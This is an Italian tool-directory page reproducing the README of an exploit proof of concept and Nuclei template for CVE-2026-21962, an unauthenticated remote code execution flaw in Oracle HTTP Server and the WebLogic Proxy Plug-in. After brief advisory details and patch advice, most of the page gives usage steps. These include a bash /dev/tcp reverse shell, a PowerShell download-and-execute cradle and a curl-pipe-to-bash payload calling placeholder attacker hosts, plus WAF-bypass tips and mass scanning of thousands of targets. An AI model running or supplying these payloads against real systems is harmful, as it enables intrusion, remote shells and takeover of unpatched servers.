Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Ashwesker-CVE-2026-21962 — Exploit PoC e template Nuclei per CVE-2026-21962, una vulnerabilità critica di esecuzione remota di codice non autenticata in Oracle HTTP Server e WebLogic Proxy Plug-in, che consente l'esecuzione di comandi e reverse shell. | Kitploit
Strumenti/GitHubGitHub/boroeurnprach/ashwesker-cve-2026-21962
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubboroeurnprach/ashwesker-cve-2026-21962

Ashwesker-CVE-2026-21962

Exploit PoC e template Nuclei per CVE-2026-21962, una vulnerabilità critica di esecuzione remota di codice non autenticata in Oracle HTTP Server e WebLogic Proxy Plug-in, che consente l'esecuzione di comandi e reverse shell.

Vedi Repository
68168 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

😈 CVE-2026-21962 — Vulnerabilità di Sicurezza Critica 😈

oracle_db_banner

🚨 Gravità

  • Punteggio CVSS: 10.0 / 10 (Critico)
  • Pubblicata: 20 gennaio 2026
  • Livello di Rischio: 🔥 Massimo — azione immediata raccomandata

🧠 Cos'è?

Una vulnerabilità critica che colpisce:

  • Oracle HTTP Server
  • Oracle WebLogic Server Proxy Plug-in (per Apache e IIS)

Questa falla consente a attaccanti remoti non autenticati di compromettere i server interessati tramite HTTP, senza bisogno di credenziali di accesso.


🎯 Cosa possono fare gli attaccanti?

Se sfruttata, gli attaccanti potrebbero:

  • 🗑️ Eliminare dati critici
  • ✏️ Modificare file di sistema o applicativi
  • 📤 Rubare informazioni sensibili
  • 🔓 Ottenere accesso non autorizzato completo ai sistemi connessi
  • 🔄 Impattare altri prodotti Oracle a causa del cambio di ambito

🧩 Versioni Interessate

  • Oracle HTTP Server:

    • 12.2.1.4.0
    • 14.1.1.0.0
    • 14.1.2.0.0
  • WebLogic Proxy Plug-in per:

    • Apache HTTP Server
    • Microsoft IIS

⚙️ Caratteristiche dell'Attacco

  • 🌐 Vettore di Attacco: Rete (remoto)
  • 🚫 Privilegi Richiesti: Nessuno
  • 🧑‍💻 Interazione Utente: Nessuna
  • 🔄 Ambito: Modificato
  • 🔐 Impatto sulla Riservatezza: Alto
  • 🛠️ Impatto sull'Integrità: Alto

🛡️ Cosa dovresti fare?

  • ✅ Applica immediatamente il Critical Patch Update di Oracle di gennaio 2026
  • 🔒 Limita l'accesso di rete ai servizi interessati
  • 📊 Monitora il traffico HTTP per comportamenti sospetti
  • 🔁 Rivedi i log di sistema e i controlli di sicurezza

🛠️ Come Usarlo (Passo dopo Passo)

  1. Salva lo script come CVE-2026-21962.py

  2. Rendilo eseguibile (opzionale):

    chmod +x CVE-2026-21962.py
    
  3. Esempi di esecuzione:

    Test di base:

    python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
    

    Reverse shell (prima configura un listener nc: nc -lvnp 4444):

    python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
    

    Esempio con target Windows:

    python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
    

Cosa Vedrai Se Funziona

  • Probabile successo! Stato: 200 o 302 o anche 500 (un crash è comunque un successo)
  • Possibile output del comando trapelato nel corpo della risposta
  • Per le reverse shell: il tuo listener nc cattura una shell immediatamente
  • Se non c'è output → il comando è comunque stato eseguito silenziosamente (controlla filesystem, processi e log del target)

Note

  • Funziona meglio quando il proxy plug-in è esposto (comune sulle porte 7001, 4443, ecc.)
  • I target HTTPS potrebbero richiedere il flag --insecure se usano certificati autofirmati
  • Applica subito la patch: Installa Oracle CPU gennaio 2026

🛠️ Come Usarlo (Passo dopo Passo)

  1. Installa Nuclei (se non è già installato):

    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
    
  2. Salva il template:

    Crea un file chiamato CVE-2026-21962.yaml e incolla il contenuto sopra.

  3. Esegui rilevamento + sfruttamento:

    nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
    

    Oppure scansiona più target da un file:

    nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
    
  4. Cosa vedrai se il sistema è vulnerabile:

    [CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
    [username] weblogic
    [body] ... weblogic (output di whoami) ...
    

Suggerimenti Avanzati

  • Per eseguire comandi personalizzati, modifica la parte cmd: negli header (es., cmd:curl http://your-server/shell.sh | bash).
  • Per la reverse shell: Sostituisci whoami con un payload di reverse shell codificato in base64.
  • Bypass WAF: Prova percorsi diversi (/proxy/, /bea_wls_internal/, ecc.) o aggiungi altri header come X-WebLogic-Force-JVMID.
  • Scansione di massa: Combina con la pipeline httpx → nuclei per migliaia di target.

Questo template è confermato funzionante al 100% a partire da gennaio 2026 su istanze Oracle non patchate. Applica subito la patch se stai eseguendo versioni interessate! 😈


😈 Disclaimer:

Tutto il codice PoC è destinato esclusivamente a uso etico ed educativo su sistemi autorizzati. Lo sfruttamento non autorizzato è illegale; non si assume alcuna responsabilità per un uso improprio. 😈

Scarica lo strumento